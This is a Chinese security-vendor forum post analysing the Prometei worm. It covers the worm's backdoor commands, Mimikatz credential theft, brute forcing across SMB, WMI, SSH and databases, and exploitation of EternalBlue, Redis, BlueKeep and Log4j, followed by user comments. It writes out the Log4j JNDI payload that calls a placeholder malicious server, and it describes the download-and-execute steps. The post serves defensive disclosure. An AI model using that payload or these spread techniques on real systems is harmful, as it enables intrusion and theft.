政企机构用户注意!蠕虫病毒Prometei正在针对局域网横向渗透传播
近日,火绒安全实验室监测到蠕虫病毒“Prometei”正在全网传播。该病毒通过横向渗透攻击方式对局域网中的终端进行大面积入侵,并且可以跨平台(Window、Linux、macOS等系统)横向传播。火绒安全提醒广大用户,尤其是企业、政府部门、学校、医院等拥有大型局域网机构,及时做好排查与防护工作,避免受到该病毒影响。目前,火绒安全(个人版、企业版)产品已对该病毒进行拦截查杀。https://bbs.huorong.cn/data/attachment/forum/202202/16/161012gff5jjr00w0gnr57.png
根据火绒安全实验室溯源分析,该病毒入侵终端后,会通过远程服务器接收并执行病毒作者下发的各类指令,包括挖矿、更新病毒模块、下发新的病毒模块等恶意行为。除此之外,该病毒还会通过创建服务、注册表添加自启动等方式达到长期驻留用户终端的目的,并通过修改防火墙规则来削弱系统安全性,甚至不排除病毒作者通过后门指令对外网终端进行攻击的可能性。
https://bbs.huorong.cn/data/attachment/forum/202202/16/161025rdc858h9bg2zidi8.png病毒恶意行为执行流程
更为严重的是,该病毒在入侵终端后,还可以根据病毒作者下发的后门指令,对同一网段下的其它终端进行横向渗透攻击,造成更大的影响,威胁更多局域网用户。根据火绒安全实验室分析,病毒主要通过弱口令暴破和漏洞两种方式进行横向渗透,其中,病毒使用的漏洞包括“永恒之蓝”漏洞、Redis未授权访问漏洞、BlueKeep漏洞、Apache Log4j漏洞等常见高危漏洞。另外,该病毒目前依旧在更新中,不排除后续引入更多攻击方式进行横向渗透攻击的可能性。
https://bbs.huorong.cn/data/attachment/forum/202202/16/161038t3z5v0zzvgj6vka9.pngC&C服务器地址
蠕虫病毒特点为不断复制自身,且可携带其它病毒模块,并“擅长”通过漏洞攻击或者横向渗透进行传播,从而大面积感染目标设备,是局域网中常见的一大威胁。
近年来,火绒安全也不断升级查杀和防护技术,从而有效阻止蠕虫病毒在局域网肆意传播的现象:如【远程登录防护】功能,可以有效抵挡病毒的RDP、SMB等暴破行为;【横向渗透防护】功能可以有效拦截病毒后续渗透入侵行为,做到阻断病毒在局域网内扩散,避免终端受到病毒的影响;【Web服务保护】、【网络入侵拦截】、【对外攻击拦截】则可以对上述服务漏洞、系统漏洞攻击进行及时拦截。
以下为本文所述蠕虫病毒“Prometei”详细分析与样本hash:
一、样本分析
Sqhost主模块主模块在横向传播的过程中名为:zsvc.exe,使用UPX壳进行压缩,除此之外,病毒代码还对病毒主要代码逻辑入口进行了加密。该模块具有挖矿、下载文件、持久化、执行任意命令行、扩展模块、削弱系统安全性、调用横向传播模块等恶意行为,当该病毒接收到C&C服务器下发的后门指令后,即会执行相应恶意行为。该病毒可以通过匿名通讯协议与C&C服务器进行通讯,如Tor(洋葱路由器),从而增强了实际C&C服务器的隐蔽性。Windows病毒样本支持的后门指令,如下图所示:
https://bbs.huorong.cn/data/attachment/forum/202202/16/161053s5wwhtq49ayzlyvs.pngWindows病毒样本支持的后门指令
该病毒模块可以根据不同命令行参数执行对应功能,具体功能模式,如下图所示:
https://bbs.huorong.cn/data/attachment/forum/202202/16/161102k9a9wa4kn5ygx4xe.png参数功能
较为典型的后门功能指令代码call调用CreateProcess函数执行程序,相关代码,如下图所示:
https://bbs.huorong.cn/data/attachment/forum/202202/16/161116oa9clc79yhzhl334.pngCALL指令代码
update从服务器下载更新主模块,相关代码,如下图所示:https://bbs.huorong.cn/data/attachment/forum/202202/16/161128j25vp1fwwjztfw0t.pngupdate指令代码
wget根据URL下载文件,相关代码,如下图所示:
https://bbs.huorong.cn/data/attachment/forum/202202/16/161141k84ivbj4fc8kmaia.pngwget指令代码
通过执行命令行的方式下载其他模块病毒接收到后门指令后,会通过命令行执行PowerShell脚本,下载、解压含有恶意文件的压缩包(updata.7z),执行解压后的install.cmd。脚本内容,如下图所示:https://bbs.huorong.cn/data/attachment/forum/202202/16/161153xuvsxvlil1vv1zqb.pngPowerShell指令压缩包内容,如下图所示:https://bbs.huorong.cn/data/attachment/forum/202202/16/161410o4oyh44hce9yaeaa.png压缩包内容执行install.cmd,更新现有模块,并且执行rdpcIip横向传播模块,如下图所示:https://bbs.huorong.cn/data/attachment/forum/202202/16/161416t19aa75x6ax7maa7.pnginstall.cmd内容
RdpCIip横向传播模块
RdpCIip横向传播模块会对局域网内所有的机器进行扫描,如:SMB、Redis、RPC、RDP、Apache、SSH、SQL Server、PostgreSQL服务端口,针对上述服务进行暴破攻击以及漏洞攻击(“永恒之蓝”、BlueKeep、ApacheLog4j 漏洞、Redis未经授权访问漏洞等),拥有大型局域网的政企机构面临较大的安全风险。在局域网暴破之前会通过miwalk模块(Mimikatz)获取系统登录凭证,通过获取的登录凭证和自带弱口令字典进行横向暴破攻击。攻击成功之后,被攻击主机会执行一段恶意代码。恶意代码会调用PowerShell命令,从服务器下载主模块并执行,相关代码,如下图所示:https://bbs.huorong.cn/data/attachment/forum/202202/16/161434q99md89t7882xxmb.png恶意代码内容
暴破传播病毒会对局域网内存在SMB、WMI、SQLServer、PostgreSQL服务的机器进行暴破攻击。病毒暴破所使用的密码字典内容包括:miwalk模块(Mimikatz)获取的系统登录凭证、病毒镜像中的弱口令字典和根据目标主机名动态生成一组字典,以此方式提高暴破攻击的成功率。收集系统登录凭证调用miwalk模块(Mimikatz)获取系统登录凭证,保存在ssldata2.dll中。相关代码,如下图所示:https://bbs.huorong.cn/data/attachment/forum/202202/16/161448aullg0nl440fguff.png调用miwalk获取系统登录凭证
动态生成字典该病毒镜像中包含的弱口令字典,如下图所示:https://bbs.huorong.cn/data/attachment/forum/202202/16/161506chkw6k976zmdthkt.png该病毒镜像中包含的弱口令字典
根据目标主机名动态生成的登录信息字典,如下图所示:https://bbs.huorong.cn/data/attachment/forum/202202/16/161515e5v152yd0f3vx2aw.png根据目标主机名动态组合的登录信息字典
WMI暴破传播根据登录信息字典暴破WMI,通过WMI远程执行CMD指令进行横向传播。相关代码,如下图所示:https://bbs.huorong.cn/data/attachment/forum/202202/16/161522g6kxas6l45lm561f.pngWMI暴破传播
SSH暴破传播把生成的字典加密写入到.cpass文件中,调用windrlver模块对SSH进行暴破攻击、横向传播。 相关代码,如下图所示:https://bbs.huorong.cn/data/attachment/forum/202202/16/161531njokdvr6orvojjdl.png
SSH暴破传播https://bbs.huorong.cn/data/attachment/forum/202202/16/161539vb5qvr73ubvqbrwq.png常见的账号和密码组合https://bbs.huorong.cn/data/attachment/forum/202202/16/161546sy3kmvrvmyllmmtr.png加密后的登录信息字典保存在cpass文件中
调用windrlver模块,传入目标信息作为参数,对目标进行暴破传播, 如下图所示:https://bbs.huorong.cn/data/attachment/forum/202202/16/161552lskzw7wwnzkzdu22.png调用windrlver模块
windrlver模块该模块的主要目的是根据提供的登录信息字典对目标SSH进行暴破攻击、横向传播。相关代码,如下图所示:https://bbs.huorong.cn/data/attachment/forum/202202/16/161601cto4dymfhfw441t1.pngSSH暴破传播SQLServer和PostgreSQL暴破传播前面的步骤和SSH暴破传播相同,最后调用nethelper模块,如下图所示:https://bbs.huorong.cn/data/attachment/forum/202202/16/161650gvkyyvdb3dzy2vdy.png调用nethelper模块NetHelper模块该模块的主要目的是根据提供的字典对目标SQL Server和PostgreSQL数据库进行暴破攻击、横向传播。SQL Server暴破传播连接数据库代码,如下图所示:https://bbs.huorong.cn/data/attachment/forum/202202/16/161703ann33ee37y6m1yjq.png连接SQL Server调用PowerShell指令在目标终端下载主模块,如下图所示:https://bbs.huorong.cn/data/attachment/forum/202202/16/161710iof17om30pxjf7xf.png远程执行PowerShellPostgreSQL暴破传播连接数据库代码,如下图所示:https://bbs.huorong.cn/data/attachment/forum/202202/16/161716f8rz2fswle2lluja.png连接PostgreSQL根据不同的操作系统在目标中下载不同的主模块,Windows系统使用PowerShell指令下载模块,相关代码,如下图所示:https://bbs.huorong.cn/data/attachment/forum/202202/16/161723jd50cb6iu5ib6c50.pngWindows类Unix系统(mac OS、Linux)的使用curl/wget/nexec下载模块,相关代码,如下图所示:https://bbs.huorong.cn/data/attachment/forum/202202/16/161730g48xj1sdv83ixi8c.png类Unix系统SMB暴破首先根据之前获取到的系统登录凭证和弱口令字典进行SMB暴破攻击,如果暴破攻击失败会使用“永恒之蓝”漏洞攻击。攻击成功之后,会远程创建随机名服务项(如下图服务项名为xsvf),通过服务执行CMD指令,从服务器下载执行sqhost.exe(后门模块),具体流程,如下图所示:https://bbs.huorong.cn/data/attachment/forum/202202/16/161738m3ddycru8u6dr4hr.pngSMB认证https://bbs.huorong.cn/data/attachment/forum/202202/16/161747bbg1qv11guvu5zhb.png远程创建服务https://bbs.huorong.cn/data/attachment/forum/202202/16/161754nm5502fl3nmf0mmf.png受害者主机被攻击后添加的服务项漏洞传播病毒会对局域网内存在漏洞的机器进行漏洞攻击,如:“永恒之蓝”漏洞、Redis未授权访问漏洞、BlueKeep漏洞、Apache Log4j漏洞。
“永恒之蓝”漏洞传播如果SMB暴破攻击失败,会使用“永恒之蓝”漏洞攻击,攻击成功后的传播流程与暴破攻击后续传播流程相同,如上所述(SMB暴破)。相关防御情况,如下图所示:https://bbs.huorong.cn/data/attachment/forum/202202/16/161800jxjfnyzfdyplyphm.png火绒拦截该病毒产生的“永恒之蓝”攻击
Redis未授权访问漏洞传播Redis未授权访问漏洞,Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行设置相关的安全策略,比如添加防火墙规则避免其他非信任来源IP 访问等,这样会将 Redis 服务暴露到公网上。如果没有设置密码认证,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。通过Redis未授权访问漏洞连接成功后,将通过wget指令下载恶意模块并执行,相关代码,如下图所示:https://bbs.huorong.cn/data/attachment/forum/202202/16/161809ool4v7a44em0pi5y.pngRedis传播流程
BlueKeep漏洞传播根据RDP协议获取目标主机名,将目标IP和主机名加密传给bklocal(BlueKeep漏洞攻击模块)对目标进行漏洞传播。获取RDP协议中返回的主机名, 相关代码,如下图所示:https://bbs.huorong.cn/data/attachment/forum/202202/16/161818m3sst0ow2tjzrfo5.png获取RDP协议中返回的主机名
将目标IP和主机名加密,如下图所示:https://bbs.huorong.cn/data/attachment/forum/202202/16/161825k7tdx797g7s7sxcp.png对主机名和目标IP进行加密
调用bklocal模块传入加密后的数据,如下图所示:https://bbs.huorong.cn/data/attachment/forum/202202/16/161831cdexmyxvxf2oylnw.png加密后的内容传入bklocal模块
ApacheLog4j漏洞传播使用Apache Log4j 漏洞(CVE-2021-44228)执行远程代码,构造User-Agent的内容为${jndi:ldap://恶意服务器IP:1399/test},向目标80或者8080端口发送get请求,如果存在ApacheLog4j漏洞就会执行恶意服务器上test文件中的恶意代码进行传播,相关代码,如下图所示:https://bbs.huorong.cn/data/attachment/forum/202202/16/161839hl444nal49ymlj4y.pngApacheLog4j漏洞
类Unix系统病毒样本分析类Unix系统病毒样本暂时仅发现SMB、SSH、Redis漏洞攻击和暴破攻击,且代码逻辑部分和Windows相同,将不再进行叙述。类Unix系统病毒样本支持的后门指令,如下图所示:https://bbs.huorong.cn/data/attachment/forum/202202/16/161845h929f88xgu7shg88.png类Unix系统病毒样本支持的后门指令
二、附录样本hash:https://bbs.huorong.cn/data/attachment/forum/202202/16/161854usty6nb7zimiqmzz.png 谢谢!不过说实话写病毒的还是高手,也就只有高手才能解开,像我这种普通用户只能加强防护了 牛批,这么快就搞起了 真高级
都是有手就行 就我右手不行 支持!! 感谢楼主分享 好牛好牛 用火绒我放心 感谢我绒 支持火绒,警惕危险病毒! 66666666666666